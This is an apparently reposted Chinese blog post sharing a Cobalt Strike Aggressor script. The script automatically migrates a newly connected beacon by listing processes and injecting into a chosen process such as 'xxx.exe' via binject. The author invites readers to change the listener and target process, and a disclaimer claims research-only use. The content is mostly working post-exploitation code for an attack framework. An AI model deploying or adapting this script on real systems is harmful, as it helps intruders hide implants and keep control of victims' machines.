唔,看到了公众号后台的留言,希望能对大家有所帮助。
on beacon_initial
{
sub callback
{
$regex = '(.*n)+xxx.exetd+t(d+)(.*n)+';
$listener = "xxx";
if ($2 ismatch $regex)
{
$pid = matched()[1];
$inject_pid = $pid;
if (-is64 $1)
{
$arch = "x64";
}
else
{
$arch = "x86";
}
binject($1, $pid, $listener, $arch);
}
}
if($inject_pid != beacon_info($1,"pid"))
{
bps($1, &callback);
}
}
可自行修改监听器的名字与需要注入的进程。演示视频(CobaltStrike4.1)如下:
本文始发于微信公众号(鸿鹄实验室):cobalestrike上线自动迁移
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论